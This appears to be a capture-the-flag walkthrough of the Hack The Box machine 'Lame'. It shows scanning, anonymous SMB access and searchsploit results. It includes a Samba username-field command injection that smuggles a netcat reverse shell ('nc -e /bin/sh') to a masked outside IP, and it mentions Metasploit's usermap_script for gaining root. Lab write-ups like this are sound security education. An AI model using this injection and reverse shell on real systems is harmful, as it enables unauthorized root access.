Lame


Contents

Intro


Normally I would've kept popping Windows boxes, but I wanted to see if I could get root flag with the newly found Copyfail exploit, which allows you to get root on shell access. This time around this ended up not happening haha.

User and Root


Nmap time:

sudo nmap -sC -sV 10.129.30.106

21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

That's a first - nothaving the HTTP port open, instead having SMB ports are open. FTP allows anonymous login, but the directory is completely empty. I tried smbmap to check whether I have anonymous access to any directories

smbmap -H 10.129.30.106
[+] IP: 10.129.30.106:445	Name: 10.129.30.106                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

We can access /tmp!

smbclient -N //10.129.30.106/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon May  4 12:26:44 2026
  ..                                 DR        0  Sat Oct 31 01:33:58 2020
  .ICE-unix                          DH        0  Mon May  4 11:46:23 2026
  vmware-root                        DR        0  Mon May  4 11:46:59 2026
  5655.jsvc_up                        R        0  Mon May  4 11:47:34 2026
  .X11-unix                          DH        0  Mon May  4 11:46:49 2026
  .X0-lock                           HR       11  Mon May  4 11:46:49 2026
  vgauthsvclog.txt.0                  R     1600  Mon May  4 11:46:21 2026

None of the subdirectories were of any use, as the permission to read through them was denied. This prompted me to backtrack a bit and use searchsploit to find any vulnerabilities for the two services running and ease the path to a shell:

searchsploit vsftpd
                                                                                                                       | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution                | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)   | unix/remote/17491.rb
searchsploit samba

Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb

Username map script sounds interesting - we can pass commands through the username field by using backticks (` `) - running the normal command smbclient //10.129.30.106/tmp -U './=`nohup nc -e /bin/sh *.*.*.* 4567`' didn't want to work, so I used the Metasploit exploit of multi/samba/usermap_script instead. That nets us a root shell!